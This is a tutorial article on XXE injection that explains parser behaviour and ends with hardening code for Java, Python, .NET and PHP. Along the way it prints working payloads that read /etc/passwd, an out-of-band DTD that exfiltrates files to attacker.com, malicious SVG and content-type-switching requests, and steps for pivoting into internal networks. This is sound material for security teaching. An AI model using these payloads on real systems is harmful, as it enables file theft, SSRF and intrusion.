Infiltrating corporate networks using XXE injection

XML External Entity (XXE) Injection — Updated 2026

DTD Abuse // File Disclosure // Blind OOB Exfiltration // SSRF via XML

Intro

External entity injection is a type of XML injection in which an attacker forces a badly configured XML parser to load external content, compromising the security of the web application. The attack has been documented since 2002, yet it continues to appear in modern applications, particularly in SOAP services, file upload handlers, and legacy enterprise integrations.

Taxonomy (2026): XXE had its own dedicated category in the OWASP Top 10 2017 (A4:2017, XML External Entities). In the OWASP Top 10 2021 it was merged into A05:2021, Security Misconfiguration. The primary CWE is CWE-611 (Improper Restriction of XML External Entity Reference). Also relevant: CWE-827 (Improper Control of Document Type Definition).

XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections — allowing embedding of data outside the main file into an XML document. A successful XXE injection attack could allow an attacker to access operating system files, cause a DoS attack, perform SSRF, or in certain conditions inject JavaScript (performing an XSS attack).

How the XML parser works

Based on W3C Recommendation — Extensible Markup Language (XML) 1.0, Fifth Edition

When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.

This rule is based on the recognition that the automatic inclusion provided by the SGML and XML entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.

When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.

How the XML parser handles XXEs

The system identifier of an external entity is meant to be converted to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of the specification, or a processing instruction defined by a particular application specification, relative URIs are relative to the location of the resource within which the entity declaration occurs.

This is defined to be the external entity containing the < which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).

Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.

In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.
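The resolution rule above can be illustrated with a minimal Python sketch. It assumes the standard RFC 3986 resolution implemented by urllib.parse.urljoin; the URIs and the function name are hypothetical and exist only for illustration.

```python
from urllib.parse import urljoin


def resolve_system_identifier(declaring_resource_uri: str, system_identifier: str) -> str:
    """Resolve a system identifier against the URI of the resource that declares the entity."""
    return urljoin(declaring_resource_uri, system_identifier)


# Hypothetical location of an external DTD subset that declares the entities.
external_subset = "http://example.com/dtds/main.dtd"

# A relative identifier is resolved against the declaring resource, not the main document.
print(resolve_system_identifier(external_subset, "entities/common.ent"))
# An absolute path keeps the scheme and host of the declaring resource.
print(resolve_system_identifier(external_subset, "/shared/chars.ent"))
# An absolute URI with its own scheme is used unchanged.
print(resolve_system_identifier(external_subset, "file:///etc/passwd"))
```

If the DTD had been reached through a redirect, the first argument would be the final URI after redirection, as the specification text above describes.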

[Figure 1: XXE attack flow, from malicious DTD to data exfiltration. The attacker crafts malicious XML (<!ENTITY xxe SYSTEM ...>); a vulnerable parser with DTD processing enabled reaches local files (file:///etc/passwd), internal services (http://internal:8080), or cloud metadata (169.254.169.254); the data is exfiltrated in-band or out-of-band via an external DTD.]

An actual example of XXE

Based on what is already explained about how the XML parser handles XXE, in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE PutMeHere [
      <!ELEMENT PutMeHere ANY>
      <!ENTITY xxe SYSTEM "/etc/passwd">
    ]>
    <PutMeHere>&xxe;</PutMeHere>

See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser, the passwd file contents will be loaded and returned.

Note: The entity reference must start with the & character and end with the ; character (&xxe;), otherwise the document is not well-formed. The attack is also limited to files whose content the XML parser accepts at the place where the external entity is referenced. Files containing non-printable characters, or stray less-than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.
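For comparison, here is a minimal sketch of how a parser that does not resolve external entities reacts to the same document. It uses Python's standard xml.etree.ElementTree, which is documented as not expanding external entities and raising ParseError when it meets one. The function name try_parse is hypothetical.

```python
import xml.etree.ElementTree as ET

# The example document from above, as bytes so the encoding declaration is honoured.
XXE_DOCUMENT = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<PutMeHere>&xxe;</PutMeHere>"""

BENIGN_DOCUMENT = b"<PutMeHere>hello</PutMeHere>"


def try_parse(document: bytes) -> str:
    """Parse the document and report whether the parser accepted or rejected it."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        return f"rejected: {exc}"
    return f"parsed: {root.text!r}"


print(try_parse(BENIGN_DOCUMENT))
print(try_parse(XXE_DOCUMENT))
```

A parser configured this way never opens /etc/passwd. The vulnerable behaviour described above needs a parser that actually resolves the SYSTEM identifier.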

Identifying XXE attack strings

The following table contains attack strings that can help someone break the XML schema and cause the XML parser to return possibly verbose errors, helping you identify the XML structures.

#    Payload            Purpose
1    '                  Single quote: break attribute values
2    ''                 Double single quote
3    "                  Double quote: break attribute values
4    ""                 Double double quote
5    <                  Open tag: trigger parser error
6    >                  Close tag
7    ]]>                CDATA end: premature closure
8    ]]>>               Malformed CDATA end
9    <!--/-->           Complete comment (dropped by the parser)
10   /-->               Partial comment close
11   -->                Comment close without open
12   <!--               Comment open without close
13   <!                 Incomplete declaration
14   <![CDATA[ / ]]>    CDATA section: bypass parsing

CDATA sections: <![CDATA[ / ]]>. CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. Characters enclosed in a CDATA section are not parsed by the XML parser.
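To see locally which of these strings break well-formedness when they land in element content, the following sketch interpolates a payload into a small template and records the parser error. It is an illustration only: the template mirrors the login document used later in this article, the probe helper is hypothetical, and error wording differs between parsers.

```python
import xml.etree.ElementTree as ET
from typing import Optional

# Hypothetical template: the payload lands inside the text of <username>.
TEMPLATE = (
    "<user><username>user1{payload}</username>"
    "<credentials>pass1</credentials></user>"
)


def probe(payload: str) -> Optional[str]:
    """Return the parser error caused by the payload, or None if the document stays well-formed."""
    try:
        ET.fromstring(TEMPLATE.format(payload=payload))
    except ET.ParseError as exc:
        return str(exc)
    return None


for payload in ["'", '"', "<", ">", "]]>", "<!--", "<!--/-->"]:
    print(repr(payload), "->", probe(payload) or "well-formed")
```

Quotes and a lone > are harmless inside element content and only matter inside attribute values, which is why the table lists them as attribute breakers.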

Exploiting XXE vulnerabilities

Let's suppose there is a web application using XML-style communication to perform user login. This is done by creating and adding a new <user> node on an XML database file. We will try to inject XML that breaks the schema. Some or all of the following attempts will generate an XML error, helping us understand the XML schema.

Valid XML request

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <user>
      <username>user1</username>
      <credentials>pass1</credentials>
    </user>

Example 1 — angle bracket injection

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <user>
      <username>user1<</username>
      <credentials>pass1</credentials>
    </user>

Example 2 — malformed comment injection

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <user>
      <username>user1<--<</username>
      <credentials>pass1</credentials>
    </user>

Example 3 — closing angle bracket

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <user>
      <username>user1></username>
      <credentials>pass1</credentials>
    </user>

Example 4 — comment injection

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <user>
      <username>user1<!--/--></username>
      <credentials>pass1</credentials>
    </user>

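The payload <!--/--> is a complete comment, so the parser silently drops it and the username is still read as user1. Injecting only the opening <!-- after the username instead causes the parser to interpret everything after it as a comment, consuming the closing tag and the credentials field and typically generating an informative error message that reveals schema structure.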

Example 5 — CDATA injection

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <user>
      <username>user1 <![CDATA[ / ]]> </username>
      <credentials>pass1</credentials>
    </user>

Example 6 — XSS via CDATA

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <user>
      <username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></username>
      <credentials>pass1</credentials>
    </user>

When the XML document is parsed, the CDATA delimiters are eliminated, reconstructing a <script> tag. If the tag contents are reflected in an HTML page, XSS is achieved.
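The reconstruction can be checked with a short sketch, shown here with Python's standard ElementTree parser. The second print shows one common countermeasure, HTML-escaping the value before it is reflected. That is an assumption about how the application renders the value, not something this scenario specifies.

```python
import html
import xml.etree.ElementTree as ET

# Example 6 without the XML declaration, split across lines for readability.
DOCUMENT = (
    "<user><username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')"
    "<![CDATA[<]]>/script<![CDATA[>]]></username>"
    "<credentials>pass1</credentials></user>"
)

# The parser merges the CDATA sections and the surrounding text into one string.
username = ET.fromstring(DOCUMENT).findtext("username")
print(username)

# Escaping before reflection turns the markup back into inert text.
print(html.escape(username))
```

The first line printed contains a working script element, while the escaped form contains no angle brackets.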

A real attack scenario

XXE attacks can result in OS file read access, similar to a path traversal attack. Consider a sophisticated e-banking application that uses the browser as a thin client, consuming a web service after successful login. The transaction XML message carries the username and password back and forth alongside the transaction data.

Client request — legitimate transaction

    <?xml version="1.0" encoding="ISO-8859-7"?>
    <appname>
      <header>
        <principal>username1</principal>
        <credential>userpass1</credential>
      </header>
      <fixedPaymentsDebitRequest>
        <fixedPayment organizationId="44" productId="61" clientId="33333333" paymentId="3" referenceDate="2008-05-12" paymentDate="20-11-25">
          <amount currency="EUR">100,1</amount>
          <transactionId>1111111</transactionId>
          <description>customer description</description>
        </fixedPayment>
      </fixedPaymentsDebitRequest>
    </appname>

Client request — with XXE injection

    <?xml version="1.0" encoding="ISO-8859-7"?>
    <!DOCTYPE foo [<!ENTITY xxefca0a SYSTEM "file:///etc/passwd"> ]>
    <appname>
      <header>
        <principal>username1&xxefca0a;</principal>
        <credential>userpass1</credential>
      </header>
      <fixedPaymentsDebitRequest>
        ...
      </fixedPaymentsDebitRequest>
    </appname>

The &xxefca0a; entity reference in the <principal> tag causes the parser to read /etc/passwd and embed its contents into the XML. The server response — whether a success or error message — will contain the file contents concatenated with the username.

Server response — file contents exfiltrated

    HTTP/1.1 400 Bad Request
    Server: Apache/x.x (Red Hat)
    Content-Type: text/html;charset=ISO-8859-1

    ...error message containing...
    username1root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    ...
    jboss:x:101:101:JBossAS:/usr/share/jbossas:/bin/sh

[Figure 2: XXE escalation, from file read to full internal network pivot. The vulnerable web app's XML parser acts as an SSRF proxy. Escalation paths: read /etc/hosts to map internal IPs, port scan http://host:PORT, fingerprint web servers and databases, map firewall egress rules. Tools: Burp Intruder (Sniper mode), DirBuster wordlist, fuzzdb. Technique: rotate ports per host and identify egress rules from error timing.]

The next step after initial file exfiltration would be to map the outbound local firewall rules to see what traffic is allowed to go out. Download the /etc/hosts file of the compromised web server, then start forwarding traffic to identified internal machines. As soon as you get a response back, you know that the specific machine is actively responding. Then rotate through all ports to identify which services are accessible. This maps the egress filtering done by the application server's local firewall.

After mapping the firewall rules, the next step would be to fingerprint surrounding web servers using DirBuster directory lists, or further escalate using HTTPS to fingerprint based on SSL/TLS error responses, and then deliver payloads or perform path traversal / SQL injection attacks through the XML parser.

What can you do with a successful XXE attack

  1. Use the application as a proxy, retrieving sensitive content from any web servers the application can reach, including those on private non-routable address space.
  2. Exploit vulnerabilities on back-end web applications, provided they can be exploited via URIs (directory brute-forcing, SQL injection, path traversal, etc.).
  3. Test for open ports on back-end systems by cycling through IP addresses and port numbers. Timing differences can be used to infer the state of requested ports. Service banners may appear in application responses.
  4. Map firewall rules on other company extranets.
  5. Cause DoS, either on the vulnerable server itself (e.g. reading /dev/random or recursive entity expansion, the "Billion Laughs" attack) or on internal company web servers reached through it.
  6. Hide port scans by mixing them with the vulnerable web server's legitimate traffic.
  7. Access cloud metadata endpoints to steal IAM credentials (AWS, GCP, Azure).
  8. Connect to internal services like syslog daemons, proxy admin panels, or unprotected file shares via UNC paths.
  9. Launch blind SQL injection attacks through the parser against surrounding database servers.
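The recursive entity expansion mentioned in item 5 is easy to underestimate, so here is a small arithmetic sketch. It assumes the classic form of the "Billion Laughs" document, which this article does not spell out: a 3-character base entity and nine nested entities that each reference the previous one ten times.

```python
def expanded_size(base_length: int, references_per_level: int, levels: int) -> int:
    """Characters produced when the outermost entity of a nested chain is fully expanded."""
    return base_length * references_per_level ** levels


# Assumed classic parameters: "lol" (3 characters), 10 references per level, 9 levels.
print(expanded_size(3, 10, 9))  # 3000000000
```

A document of under a kilobyte therefore expands to roughly 3 GB in memory, which is why parsers that cap entity expansion or reject DTDs outright are not affected.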

Modern attack vectors

Blind XXE via out-of-band (OOB) exfiltration

When the application does not return the parsed entity content in its response (no direct output), blind XXE via OOB channels can still exfiltrate data. The technique uses parameter entities to load an external DTD from an attacker-controlled server, which in turn constructs a URL containing the target file's contents and forces the parser to request it.

Malicious payload sent to the application:

    <?xml version="1.0"?>
    <!DOCTYPE foo [
      <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
      %xxe;
    ]>
    <root>test</root>

Contents of evil.dtd hosted on attacker.com:

    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
    %eval;
    %exfil;

The parser loads the external DTD, reads the target file into the %file; parameter entity, constructs a URL containing the file data, and makes an HTTP request to the attacker's server — exfiltrating the data in the URL query string. This works even when no XML output is reflected to the attacker.

[Figure 3: Blind XXE via out-of-band (OOB) data exfiltration. Step 1: the attacker sends XXE with an external DTD reference. Step 2: evil.dtd is hosted by the attacker. Step 3: the parser loads the DTD. Step 4: the parser reads the local file file:///etc/hostname (content: "prod-web-01"). Step 5: the parser requests GET /?data=prod-web-01 from attacker.com, and the attacker reads the data from the access logs.]

XXE via file upload

Many common file formats are XML-based internally. Uploading a malicious file in one of these formats can trigger XXE processing even when the application doesn't appear to accept XML input:

  1. SVG images — SVG is XML. A malicious SVG with an XXE payload can trigger when the server processes the image (thumbnail generation, rendering, metadata extraction).
  2. DOCX / XLSX / PPTX — Microsoft Office Open XML formats are ZIP archives containing XML files. Replacing [Content_Types].xml or other internal XML files with XXE payloads can trigger the vulnerability when the server parses the document.
  3. SOAP endpoints — SOAP is inherently XML-based. DTD declarations injected into SOAP envelopes are frequently processed by the underlying XML parser.

Malicious SVG file (upload as profile picture, etc.):

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE svg [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <svg xmlns="http://www.w3.org/2000/svg">
      <text x="0" y="20">&xxe;</text>
    </svg>
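On the defensive side, an upload handler can refuse any XML part that carries a DOCTYPE before handing the file to a real document processor. The following is a minimal sketch under stated assumptions: it uses the standard expat bindings and zipfile, the helper names (is_suspicious_xml, suspicious_members, build_demo_archive) are hypothetical, and it does not guard against decompression bombs or oversized members.

```python
import io
import zipfile
from typing import List
from xml.parsers import expat


class DoctypeFound(Exception):
    """Raised from the expat handler as soon as a DOCTYPE declaration starts."""


def is_suspicious_xml(xml_bytes: bytes) -> bool:
    """True if the XML declares a DOCTYPE or is not well-formed."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeFound(name)

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except (DoctypeFound, expat.ExpatError):
        return True
    return False


def suspicious_members(archive_bytes: bytes) -> List[str]:
    """Names of XML parts inside a ZIP-based document that should be rejected."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            # Assumption: only .xml and .rels parts are parsed downstream.
            if name.endswith((".xml", ".rels")) and is_suspicious_xml(archive.read(name)):
                flagged.append(name)
    return flagged


MALICIOUS_XML = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE Types [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<Types>&xxe;</Types>"
)


def build_demo_archive() -> bytes:
    """Build an in-memory ZIP that imitates a tampered Office document."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", MALICIOUS_XML)
        archive.writestr("word/document.xml", b"<document>hello</document>")
    return buffer.getvalue()


print(suspicious_members(build_demo_archive()))
```

The same is_suspicious_xml check applies directly to an uploaded SVG, since the SVG is itself the XML document.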

Content-type switching (JSON to XML)

Some application frameworks accept both JSON and XML based on the Content-Type header. If an API endpoint normally expects JSON, switching the Content-Type to application/xml or text/xml may cause the server to route the body through an XML parser — even if the developers never intended to accept XML input. This is particularly common with Java-based REST frameworks (JAX-RS, Spring MVC).

Original JSON request:

    POST /api/login HTTP/1.1
    Content-Type: application/json

    {"username": "admin", "password": "test"}

Switched to XML with XXE:

    POST /api/login HTTP/1.1
    Content-Type: application/xml

    <?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <root>
      <username>&xxe;</username>
      <password>test</password>
    </root>
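A simple guard against this switch is to check the media type before the body reaches any parser. The sketch below is framework-agnostic. The allowlist contents and the function name are assumptions, and a real application would wire the check into its framework's request handling.

```python
# Assumption: this endpoint is meant to accept JSON only.
ALLOWED_MEDIA_TYPES = {"application/json"}


def is_allowed_content_type(header_value: str) -> bool:
    """Accept the request only if the media type, ignoring parameters, is allowlisted."""
    media_type = header_value.split(";", 1)[0].strip().lower()
    return media_type in ALLOWED_MEDIA_TYPES


for value in ["application/json; charset=utf-8", "application/xml", "text/xml", ""]:
    print(repr(value), "->", "accept" if is_allowed_content_type(value) else "reject")
```

Rejecting by allowlist rather than blocking known XML types also covers variants such as application/soap+xml.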

Mitigation of XXE vulnerabilities

The primary defense is to disable DTD processing and external entity resolution in your XML parser. The exact configuration varies by language and library:

Java (DocumentBuilderFactory)

    import javax.xml.parsers.DocumentBuilderFactory;

    // setFeature throws ParserConfigurationException if the parser does not support the feature
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

    // Disable DTDs entirely (most secure)
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

    // If DTDs can't be disabled, at minimum disable external entities
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);

Python (lxml / defusedxml)

    # Use defusedxml, a drop-in replacement that blocks XXE by default
    import defusedxml.ElementTree as ET
    tree = ET.parse('input.xml')

    # Or with lxml, disable network access and entity resolution
    from lxml import etree
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False,
    )
    tree = etree.parse('input.xml', parser)  # pass the hardened parser explicitly

.NET (XmlReaderSettings)

    using System.Xml;

    XmlReaderSettings settings = new XmlReaderSettings();
    settings.DtdProcessing = DtdProcessing.Prohibit;
    settings.XmlResolver = null;
    XmlReader reader = XmlReader.Create(stream, settings);

PHP (libxml)

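    // PHP < 8.0 only: disable entity loading before any XML parsing.
    // The function is deprecated as of PHP 8.0, so guard the call.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    // For SimpleXML: block network access and do NOT pass LIBXML_NOENT,
    // which turns entity substitution on.
    $xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NONET);

Important: libxml_disable_entity_loader() is deprecated as of PHP 8.0, because libxml2 >= 2.9.0 disables external entity loading by default. Never pass LIBXML_NOENT when parsing untrusted input: despite its name, the flag enables entity substitution and reopens the XXE hole. Always verify your specific PHP and libxml2 versions, since older deployments may still be vulnerable.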

General hardening principles

  1. Disable DTD processing entirely — this is the most effective defense. If your application doesn't need DTD validation (and almost none do), disable the DOCTYPE declaration completely.
  2. Use allowlists for external entity URIs — if external entities are genuinely needed, restrict them to known-good URIs only.
  3. Validate Content-Type headers — reject XML content types on endpoints that should only accept JSON. This blocks content-type switching attacks.
  4. Scan uploaded files — inspect DOCX, XLSX, SVG, and other XML-based file formats for DTD declarations before processing them.
  5. Apply network-level controls — even if XXE is exploited, egress filtering, IMDSv2 enforcement, and network segmentation limit the blast radius.
  6. Use SAST tools — static analysis can identify insecure XML parser configurations. Tools like Semgrep have built-in rules for XXE detection across multiple languages.

Summary

When an application is vulnerable to XXE, the attacker may be capable of gaining access to the web server OS file system, causing DoS attacks (via /dev/random or recursive entity expansion), performing SSRF against internal services, exfiltrating data via out-of-band channels, or even achieving XSS through XML-to-HTML reflection. Modern XXE often comes through non-obvious vectors: SVG uploads, Office documents, SOAP endpoints, and content-type switching on REST APIs.

